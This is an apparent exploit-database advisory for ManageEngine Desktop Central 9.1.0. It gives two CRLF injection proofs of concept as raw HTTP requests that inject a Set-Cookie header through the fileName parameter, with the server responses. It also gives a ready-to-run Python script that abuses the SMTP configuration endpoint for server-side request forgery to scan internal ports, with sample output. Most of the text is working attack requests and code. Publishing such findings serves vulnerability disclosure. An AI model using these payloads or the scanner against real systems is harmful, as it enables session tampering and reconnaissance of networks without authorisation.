# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-02-14 # Software Link : http://www.desktopcentral.com # Tested Version: 9.1.0 (Build No: 91084) # Tested on: Windows 10 # Vulnerability Type: CRLF injection (CRLF) - 1 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost Response: HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv X-dc-header: yes Content-Length: 95 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/csv;charset=UTF-8 # Vulnerability Type: CRLF injection (CRLF) - 2 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 X-dc-header: yes Content-Length: 4470 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf;charset=UTF-8 # Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3: 8.0 CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CWE: CWE-918 Server-Side Request Forgery (SSRF) Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker can force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability allows authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks. Proof of concept: Save this content in a python file (ex. ssrf_manageenginedesktop9.py), change the variable sitevuln value with ip address: import argparse from termcolor import colored import requests import urllib3 import datetime urllib3.disable_warnings() print(colored(''' ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ ''',"red")) def smtpConfig_ssrf(target,port,d): now1 = datetime.datetime.now() text = '' sitevuln = 'localhost' url = 'https:// '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% 40manageengine.com &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% 40manageengine.com' cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' try: response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10) text = response.text now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if ('updateRefMsgCookie' in text): return colored('Cookie lost',"yellow") if d == "0": print ('Time response: ' + str(rest) + '\n' + text + '\n') if (seconds > 5.0): return colored('open',"green") else: return colored('closed',"red") except: now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if (seconds > 10.0): return colored('open',"green") else: return colored('closed',"red") return colored('unknown',"yellow") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False) args = parser.parse_args() timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) print (args.ip + ':' + args.port + ' ' + timeresp + '\n') And: $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:8080 open $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:7777 closed